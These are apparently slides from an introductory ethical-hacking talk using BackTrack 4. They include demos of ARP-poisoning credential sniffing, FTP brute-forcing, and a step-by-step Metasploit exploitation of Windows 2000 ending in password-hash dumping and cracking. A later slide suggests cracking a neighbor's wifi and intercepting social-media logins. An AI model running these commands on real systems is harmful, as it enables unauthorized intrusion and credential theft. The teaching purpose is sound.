2. Who Am I?
● Attended UCSB 2004-2008
– Majored in Math and Philosophy, not CS
● Started using Linux in 2001
– Mandrake, then Slackware, then Debian
● Applying for penetration testing job in January
● Biases/“Preferences”
– Linux > Windoze (duh)
– Python > Ruby
– Emacs > vi
– Debian (and variants) > others
3. Can Hacking Be Ethical?
Or, what is Ethical Hacking?
● Black Hat
– Compromises computer systems without permission
– Criminal
● White Hat, aka Ethical Hacker
– Gets paid to hack – legally (friggin' sweet)
– Always gets permission before attacking a system
● Gray Hat
– Some combination of Black and White
4. The Stages of Hackerdom
● Script Kiddie (“skiddie”)
– Can only run automated tools
– Doesn't understand underlying technology
● Advanced Beginner
– Mastered advanced features of many tools
– Knows enough programming to create own tools
● C => Python, Ruby (see next slide)
● Uberhacker
– Discovers new vulnerabilities (or new types of vulns)
– Knows Assembly, C, Python and/or Ruby, SQL
– Excellent programmer; writes tools, scripts regularly
– Can defend as well as attack (firewalls, IDS, etc)
9. Back|Track 4 Categories
● Information Gathering
– Email addresses, DNS
● Network Mapping
● Vulnerability Identification
● Web Application Analysis
● Radio Network Analysis
● Penetration (not that kind)
10. Back|Track 4 Categories
● Privilege Escalation
● Maintaining Access
● Digital Forensics
● Reverse Engineering
● VoIP (Voice over Internet Protocol)
● Misc
11. DEMO: Sniffing Passwords
with Ettercap
● ARP Poisoning for MitM Attack
– Associate attacker's MAC with router's IP
– Target tries to route traffic through router
● Routes it through attacker instead
– Attacker forwards traffic both ways
– Attacker can silently watch or inject traffic
● TheMiddler, sslstrip
12. How Else Can We Get Creds?
● Phishing
– Via email
● Spear Phishing
– Becoming popular
– Very hard to stop
● In-person Social Engineering
– Kevin Mitnick is famous for this
● Brute force
13. DEMO: Bruteforcing FTP
● Using Hydra to bruteforce weak FTP password
– Well, really a dictionary attack
14. DEMO: Pwning Win2k
● Create database (or connect to existing)
– db_create [optional_database_name]
● Find win2k box using nmap (in metasploit)
– db_nmap -sV -p 135,139,445 xxx.xxx.xxx.0/24
● Search Metasploit for win2k exploits
– search 2000
● Use exploit w/meterpreter
– use exploit/windows/smb/ms05_039_pnp
– set PAYLOAD windows/meterpreter/bind_tcp
● Which parameters still need to be set?
– show options
15. DEMO: Pwning Win2k
● Set parameters
– set RHOST [target_ip]
● Now we exploit! Can you guess the command?
– exploit
● Get hashes
– hashdump
– This would be much harder without meterpreter!
● Copy and paste hashes into new text file
● Crack hashes with john the ripper
– ./john [file_containing_hashes].txt
● Game Over
16. Why Become an Ethical Hacker?
● Field is growing (see next slide)
– New laws, regulations
– US government falling behind in cyber security
● You get paid to hack – need I say more?
– Banks
– Telecoms
– Casinos
– Foreign countries (for the federal gov't)
17.
18. How Can I Practice Legally?
● Virtualization (VMware, VirtualBox)
– Use virtual images from recent CTF competitions
● http://lampsecurity.org/capture-the-flag-6
● http://ctf.hcesperer.org/25c3ctf
● http://ctf.hcesperer.org/daopen08
● http://ctf.hcesperer.org/eh08ctf
● NetWars
– Part of government's Cyber Defense Initiative 2009
● DVL: Damn Vulnerable Linux
– Purposely misconfigured, exploitable
– http://tinyurl.com/dvllinux15
20. Tools Added to Back|Track
Extra Tools I Used
● Metasploit 3.3.2 (updated)
● Nmap 5.0 (updated)
● Exploitdb archive (/pentest/exploits/exlpoitdb)
21. Summary
● Hacking can be ethical
● “Computer security” is an oxymoron
– No one is safe
● REALLY powerful hacking tools exist
● Metasploit is effing dangerous
22. Future Demos?
● More local fun
– Crack neighbor's wifi (WEP)
– Exploit remote vuln in DD-WRT firmware
– Redirecting traffic using fake DNS server
– Intercepting Twitter, Facebook, LinkedIn creds
● More like real pen testing
– SQL injection
– XSS
– Nessus scan
23. Contact Information
● Name: Steve Phillips
● New Blog: SweetHack.blogspot.com
● Email: fraktil@gmail.com
● Twitter: twitter.com/fraktil
● LinkedIn: linkedin.com/in/sdphillips
● IRC: fraktil in #sblug on borg-cube.com